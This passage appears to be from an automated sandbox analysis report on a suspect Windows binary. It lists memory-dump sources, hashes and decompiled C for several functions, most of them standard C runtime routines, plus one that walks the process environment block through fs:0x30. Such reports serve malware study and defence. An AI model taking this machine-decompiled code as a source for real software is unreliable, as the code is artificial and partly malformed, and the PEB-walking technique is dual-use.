                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e5808a4c80d3016502dc6e4ed8f1a094673abc2e4b554b3c324c012efd86656
                                        • Instruction ID: 25a1b92ec86ebac05cab8754daf84111b7b64c3fee26d8f7c41475d05b48e8b0
                                        • Opcode Fuzzy Hash: 2e5808a4c80d3016502dc6e4ed8f1a094673abc2e4b554b3c324c012efd86656
                                        • Instruction Fuzzy Hash: DEE04F31004648EFDF117F64CD489883F69FF80691F008124FDC89B121CF35D842CA90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01099E2B, Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b533e3374486e534638c2d2179cba0d3e6042a64eef1efaf6d759d031b1635
                                        • Instruction ID: edbeea8e5c6fb71a69e4ec0f3e4306e3e624e4c01aab7cdbfdcf77d98798730a
                                        • Opcode Fuzzy Hash: 23b533e3374486e534638c2d2179cba0d3e6042a64eef1efaf6d759d031b1635
                                        • Instruction Fuzzy Hash: 1EC0123364510006C2285D1C6C853A0F738D7A3238E45A792E845D7151C182C4958188
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010802BD, Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                        • Instruction ID: 3ffdc6de70178071e0c2f2e2c16fb22c7874de4ce5901825db191ab6e7fb43b1
                                        • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                        • Instruction Fuzzy Hash: B3B0127071A5C04EFB67C338C415B0576F0AB40F01FC994E0F085C2C86C39CC988D100
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01077A20, Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E01077A20() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                        0x01077a33

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01080D23, Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01068E85, Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E01068E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E010632EE(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E010632EE(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E010632EE(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E0106899A( *_t42, 0x107e2e8);
								_t15 = E01069285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E010632B6();
									E0106363B( *_t42);
									E010634E1( *_t42);
									E010632B6(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E01063D75(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E010632B6( *_t42);
							E010632B6(_t42);
							L8:
							goto L3;
						}
						E010632B6(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E01064196(_t48))) = 0xc;
					goto L4;
				}
			}











                                        0x01068e8e
                                        0x01068eb4
                                        0x00000000
                                        0x01068e96
                                        0x01068ea1
                                        0x01068ea5
                                        0x01068ea7
                                        0x01068ec0
                                        0x01068ec5
                                        0x01068ec9
                                        0x01068ecb
                                        0x01068edc
                                        0x01068ee1
                                        0x01068ee6
                                        0x01068ee8
                                        0x01068f01
                                        0x01068f0e
                                        0x01068f16
                                        0x01068f19
                                        0x01068f1b
                                        0x01068f30
                                        0x01068f30
                                        0x01068f37
                                        0x01068f3e
                                        0x01068f44
                                        0x01068f4c
                                        0x01068f55
                                        0x00000000
                                        0x01068f55
                                        0x01068f1f
                                        0x01068f22
                                        0x01068f29
                                        0x01068f2b
                                        0x01068f53
                                        0x00000000
                                        0x01068f53
                                        0x01068f2d
                                        0x00000000
                                        0x01068f2d
                                        0x01068eec
                                        0x01068ef2
                                        0x01068ed3
                                        0x00000000
                                        0x01068ed3
                                        0x01068ece
                                        0x00000000
                                        0x01068ece
                                        0x01068ea9
                                        0x01068eae
                                        0x00000000
                                        0x01068eae

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: 9946b614709d4a7d4f53895f8b27c2e6bd6d6a945d02e042357d1777cd682725
                                        • Instruction ID: afbdd92a562c442b85e8f65c81aa0ca17e4ce2b9ec2fcc4ccf0fcc0ae5777c7f
                                        • Opcode Fuzzy Hash: 9946b614709d4a7d4f53895f8b27c2e6bd6d6a945d02e042357d1777cd682725
                                        • Instruction Fuzzy Hash: 8F21A135508713EAEB327F69DC01A8BBBEDEF61754B10846AE9CD99160EE328400C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106197C, Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E0106197C(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;
				intOrPtr _t39;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10c1b34);
				_t25 =  *0x10bfcfc; // 0x0
				_t24 = __eax;
				if(_t25 == 0) {
					L4:
					_push(_t14);
					E010632B6(_t25);
					_t26 =  *0x10bfcf8; // 0x12e0f40
					 *0x10bfcfc = 0;
					if(_t26 == 0) {
						L8:
						E010632B6(_t26);
						 *0x10bfcf8 = 0;
						E010632B6( *0x10bfcf4);
						_t5 = E010632B6( *0x10bfcf0);
						_t27 = _t26 | 0xffffffff;
						 *0x10bfcf4 = 0;
						 *0x10bfcf0 = 0;
						if(_t24 != _t27) {
							_t39 =  *0x10c1b34; // 0x79d9729f
							if(_t39 != 0) {
								_t5 = E010632B6(_t24);
							}
						}
						__imp__EncodePointer(_t27);
						 *0x10c1b34 = _t5;
						_t6 =  *0x10c06f4; // 0x0
						if(_t6 != 0) {
							E010632B6(_t6);
							 *0x10c06f4 = 0;
						}
						_t7 =  *0x10c06f8; // 0x0
						if(_t7 != 0) {
							E010632B6(_t7);
							 *0x10c06f8 = 0;
						}
						_t8 =  *0x107e7d4; // 0x12de060
						asm("lock xadd [eax], esi");
						if(_t27 != 1) {
							L18:
							return _t8;
						} else {
							_t8 =  *0x107e7d4; // 0x12de060
							if(_t8 == 0x107e5b0) {
								goto L18;
							}
							_t9 = E010632B6(_t8);
							 *0x107e7d4 = 0x107e5b0;
							return _t9;
						}
					}
					while( *_t26 != 0) {
						E010632B6( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x10bfcf8; // 0x12e0f40
					goto L8;
				}
				while( *_t25 != 0) {
					E010632B6( *_t25);
					_t25 = _t25 + 4;
					if(_t25 != 0) {
						continue;
					}
					break;
				}
				_t25 =  *0x10bfcfc; // 0x0
				goto L4;
			}














                                        0x0106197c
                                        0x01061984
                                        0x0106198a
                                        0x01061990
                                        0x01061994
                                        0x010619ae
                                        0x010619ae
                                        0x010619b0
                                        0x010619b5
                                        0x010619bd
                                        0x010619c6
                                        0x010619df
                                        0x010619e0
                                        0x010619eb
                                        0x010619f1
                                        0x010619fc
                                        0x01061a01
                                        0x01061a04
                                        0x01061a0d
                                        0x01061a15
                                        0x01061a17
                                        0x01061a1d
                                        0x01061a20
                                        0x01061a25
                                        0x01061a1d
                                        0x01061a27
                                        0x01061a2d
                                        0x01061a32
                                        0x01061a39
                                        0x01061a3c
                                        0x01061a42
                                        0x01061a42
                                        0x01061a48
                                        0x01061a4f
                                        0x01061a52
                                        0x01061a58
                                        0x01061a58
                                        0x01061a5e
                                        0x01061a63
                                        0x01061a69
                                        0x01061a88
                                        0x01061a88
                                        0x01061a6b
                                        0x01061a6b
                                        0x01061a77
                                        0x00000000
                                        0x00000000
                                        0x01061a7a
                                        0x01061a80
                                        0x00000000
                                        0x01061a80
                                        0x01061a69
                                        0x010619c8
                                        0x010619ce
                                        0x010619d4
                                        0x010619d7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x010619d7
                                        0x010619d9
                                        0x00000000
                                        0x010619d9
                                        0x01061996
                                        0x0106199d
                                        0x010619a3
                                        0x010619a6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x010619a6
                                        0x010619a8
                                        0x00000000

                                        APIs
                                        • DecodePointer.KERNEL32 ref: 01061984
                                        • _free.LIBCMT ref: 0106199D
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • _free.LIBCMT ref: 010619B0
                                        • _free.LIBCMT ref: 010619CE
                                        • _free.LIBCMT ref: 010619E0
                                        • _free.LIBCMT ref: 010619F1
                                        • _free.LIBCMT ref: 010619FC
                                        • _free.LIBCMT ref: 01061A20
                                        • EncodePointer.KERNEL32(012E0F40), ref: 01061A27
                                        • _free.LIBCMT ref: 01061A3C
                                        • _free.LIBCMT ref: 01061A52
                                        • _free.LIBCMT ref: 01061A7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction ID: a17bde0e0b59de6b1cfcdf2f924f9eeba8bb176dc4785910cc9ca4401e96ef6d
                                        • Opcode Fuzzy Hash: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction Fuzzy Hash: 8F217E71D021538FD7719F58F9C0989BBE9BB4472032500AAEDD8A734DDE3A4884CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01068F5C, Relevance: 15.1, APIs: 10, Instructions: 131COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E01068F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E0106551B(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01064112(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x107cf88);
					E010627F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E010615FE();
						_v36 = _t88;
						E010636DB(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E010632EE(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E01063117(0xc);
							_v8 = 1;
							E0106899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E010690D1();
							_t66 = E01069285(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0106363B(_t83);
								_t43 = E010634E1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E0106DB06(_a8, 0x107e17c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x10c0a44 = 1;
									}
								}
								E01063117(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0106375B(_t25, _t83);
								E0106363B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x107ecf4 & 0x00000001;
									if(( *0x107ecf4 & 0x00000001) == 0) {
										E0106375B(0x107e2e4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x107e2e4; // 0x107e2e8
										_t32 = _t77 + 0x84; // 0x107ed00
										 *0x107ecf8 =  *_t32;
										_t33 = _t77 + 0x90; // 0x1079570
										 *0x107ed54 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x107e178 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E010690E0();
							}
						}
						_v8 = 0xfffffffe;
						E01069113(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E01064196(__eflags))) = 0x16;
						E010640E7();
						_t45 = 0;
					}
					return E01062835(_t45);
				}
				L20:
			}

















                                        0x01068f5c
                                        0x01068f5f
                                        0x01068f62
                                        0x01068f63
                                        0x01068f68
                                        0x01068f8c
                                        0x01068f8f
                                        0x01068f6a
                                        0x01068f6a
                                        0x01068f6b
                                        0x01068f6e
                                        0x01068f6e
                                        0x01068f79
                                        0x01068f7e
                                        0x01068f83
                                        0x00000000
                                        0x00000000
                                        0x01068f85
                                        0x01068f89
                                        0x00000000
                                        0x01068f8b
                                        0x00000000
                                        0x01068f8b
                                        0x00000000
                                        0x01068f89
                                        0x01068f90
                                        0x01068f91
                                        0x01068f92
                                        0x01068f93
                                        0x01068f94
                                        0x01068f95
                                        0x01068f9a
                                        0x01068f9b
                                        0x01068f9d
                                        0x01068fa2
                                        0x01068fa7
                                        0x01068fa9
                                        0x01068fac
                                        0x01068fb0
                                        0x01068fce
                                        0x01068fd0
                                        0x01068fd3
                                        0x01068fd8
                                        0x01068fdc
                                        0x01068fed
                                        0x01068fef
                                        0x01068ff2
                                        0x01068ff4
                                        0x01068ffc
                                        0x01069002
                                        0x0106900d
                                        0x01069014
                                        0x01069018
                                        0x0106902c
                                        0x0106902e
                                        0x01069031
                                        0x01069033
                                        0x010690ec
                                        0x010690f2
                                        0x01069039
                                        0x01069039
                                        0x0106903d
                                        0x01069047
                                        0x0106904e
                                        0x01069050
                                        0x01069052
                                        0x01069052
                                        0x01069050
                                        0x0106905e
                                        0x01069064
                                        0x0106906b
                                        0x01069070
                                        0x01069076
                                        0x0106907e
                                        0x01069082
                                        0x01069084
                                        0x0106908b
                                        0x01069095
                                        0x0106909c
                                        0x010690a2
                                        0x010690a8
                                        0x010690ad
                                        0x010690b3
                                        0x010690b8
                                        0x010690bb
                                        0x010690bb
                                        0x0106908b
                                        0x010690c0
                                        0x010690c4
                                        0x010690c4
                                        0x01069033
                                        0x010690f9
                                        0x01069100
                                        0x01069105
                                        0x01068fb2
                                        0x01068fb7
                                        0x01068fbd
                                        0x01068fc2
                                        0x01068fc2
                                        0x0106910c
                                        0x0106910c
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-0
                                        • Opcode ID: 604257f785f0c065a86faf1949826847a4a27da4bbe9b07088313d6405a84514
                                        • Instruction ID: 7e6ceb9876812edad1a307fdf46b70e193b28217f6050780d6eb8bdb4e589736
                                        • Opcode Fuzzy Hash: 604257f785f0c065a86faf1949826847a4a27da4bbe9b07088313d6405a84514
                                        • Instruction Fuzzy Hash: 9D41E632904306EFEB20AFA8D941BDD7BF9BF14314F10846EFA98AB181DB765541CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010617CB, Relevance: 15.1, APIs: 10, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E010617CB(void* __edx, char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				intOrPtr* _t7;
				intOrPtr _t9;
				short* _t10;
				short* _t12;
				short* _t14;
				int _t15;
				short* _t22;
				int _t24;
				void* _t27;
				void* _t31;
				short* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_push(_t27);
				_t24 = 0;
				_t36 = _a4;
				if(_a4 != 0) {
					_t33 = _a8;
					__eflags = _t33;
					if(__eflags == 0) {
						goto L1;
					}
					_t10 = E01062D64(_t27);
					__eflags = _t10;
					if(_t10 == 0) {
						_t22 = AreFileApisANSI();
						__eflags = _t22;
						if(_t22 == 0) {
							_t24 = 1;
							__eflags = 1;
						}
					}
					 *_t33 = 0;
					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
					_v8 = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E01063336(_t31, _t12 + _t12);
						 *_t33 = _t14;
						__eflags = _t14;
						if(_t14 == 0) {
							goto L9;
						}
						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
						__eflags = _t15;
						if(_t15 != 0) {
							_t9 = 1;
							__eflags = 1;
							goto L14;
						}
						E01064175(GetLastError());
						E010632B6( *_t33);
						 *_t33 =  *_t33 & 0x00000000;
						goto L8;
					} else {
						E01064175(GetLastError());
						L8:
						L9:
						_t9 = 0;
						L14:
						return _t9;
					}
				}
				L1:
				_t7 = E01064196(_t36);
				_t34 = 0x16;
				 *_t7 = _t34;
				E010640E7();
				_t9 = _t34;
				goto L14;
			}

















                                        0x010617cb
                                        0x010617ce
                                        0x010617d0
                                        0x010617d3
                                        0x010617d6
                                        0x010617ee
                                        0x010617f1
                                        0x010617f3
                                        0x00000000
                                        0x00000000
                                        0x010617f5
                                        0x010617fa
                                        0x010617fc
                                        0x010617fe
                                        0x01061804
                                        0x01061806
                                        0x0106180a
                                        0x0106180a
                                        0x0106180a
                                        0x01061806
                                        0x01061814
                                        0x01061818
                                        0x0106181e
                                        0x01061821
                                        0x01061823
                                        0x01061839
                                        0x0106183e
                                        0x01061841
                                        0x01061843
                                        0x00000000
                                        0x00000000
                                        0x01061851
                                        0x01061857
                                        0x01061859
                                        0x01061876
                                        0x01061876
                                        0x00000000
                                        0x01061876
                                        0x01061862
                                        0x01061869
                                        0x0106186e
                                        0x00000000
                                        0x01061825
                                        0x0106182c
                                        0x01061831
                                        0x01061832
                                        0x01061832
                                        0x01061877
                                        0x0106187c
                                        0x0106187c
                                        0x01061823
                                        0x010617d8
                                        0x010617d8
                                        0x010617df
                                        0x010617e0
                                        0x010617e2
                                        0x010617e7
                                        0x00000000

                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 010617F5
                                        • AreFileApisANSI.KERNEL32 ref: 010617FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061818
                                        • GetLastError.KERNEL32 ref: 01061825
                                        • __dosmaperr.LIBCMT ref: 0106182C
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: 2ec84b278c6ac57fc3da53dbe8e5e9c64163e580e26632720a2e90e09d000fcf
                                        • Instruction ID: d2bf931f15f0fea34c8563e5625d018a8aa35bb41f1268d121ebd0bfd51566b2
                                        • Opcode Fuzzy Hash: 2ec84b278c6ac57fc3da53dbe8e5e9c64163e580e26632720a2e90e09d000fcf
                                        • Instruction Fuzzy Hash: 71110DB1A04206FFEB726FB49C48A7E7BECEF54661B208569F9D5D5181EB35C800C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061738, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E01061738(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E01061BC7(_t3);
				if(E01063268() != 0) {
					_t6 = E01062BEF(E01061493);
					 *0x107e000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E010632EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E010617AE();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E01062C4B( *0x107e000, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E01061685(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E010617AE();
					return 0;
				}
			}








                                        0x01061738
                                        0x01061744
                                        0x01061753
                                        0x01061758
                                        0x0106175e
                                        0x01061761
                                        0x00000000
                                        0x01061763
                                        0x01061770
                                        0x01061774
                                        0x01061776
                                        0x010617a5
                                        0x010617a5
                                        0x010617aa
                                        0x010617ad
                                        0x01061778
                                        0x01061786
                                        0x01061788
                                        0x00000000
                                        0x0106178a
                                        0x0106178a
                                        0x0106178c
                                        0x0106178d
                                        0x01061794
                                        0x0106179a
                                        0x0106179e
                                        0x010617a2
                                        0x010617a4
                                        0x010617a4
                                        0x01061788
                                        0x01061776
                                        0x01061746
                                        0x01061746
                                        0x01061746
                                        0x0106174d
                                        0x0106174d

                                        APIs
